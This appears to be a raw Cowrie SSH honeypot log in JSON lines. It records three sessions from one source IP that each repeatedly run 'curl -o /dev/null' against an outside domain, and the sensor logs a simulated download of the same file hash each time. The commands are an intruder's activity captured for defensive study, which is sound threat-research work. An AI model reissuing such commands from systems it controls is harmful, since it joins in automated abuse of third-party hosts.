{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.131245Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:37.133796Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.134274Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:37.165528Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.166562Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:37.170294Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.171014Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:37.173630Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.174037Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.205191Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.208426Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:37.238056Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.239050Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:37.240756Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.242048Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:37.244319Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.244926Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.248036Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.250339Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.281888Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:37.283964Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.285143Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:37.288344Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.289041Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:37.293777Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.294589Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.299632Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.303435Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.307629Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:37.332334Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.333188Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:37.335803Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.336806Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:37.341312Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.341841Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.344964Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.347372Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.350348Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:37.377127Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.378014Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:37.380293Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.381158Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.385745Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.388229Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:37.389740Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.390463Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.417416Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:37.419756Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.420492Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:37.423504Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.424650Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.428115Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.432011Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:37.434728Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.435604Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.469968Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:37.471659Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.472440Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:37.475144Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.475939Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:37.478481Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.479166Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.484352Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.487278Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.512970Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:37.514309Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.515251Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:37.522332Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.522960Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:37.524284Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.525090Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.529473Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.532179Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.535854Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:37.561742Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.562450Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:37.564200Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.564837Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:37.568913Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.586969Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:37.604146Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
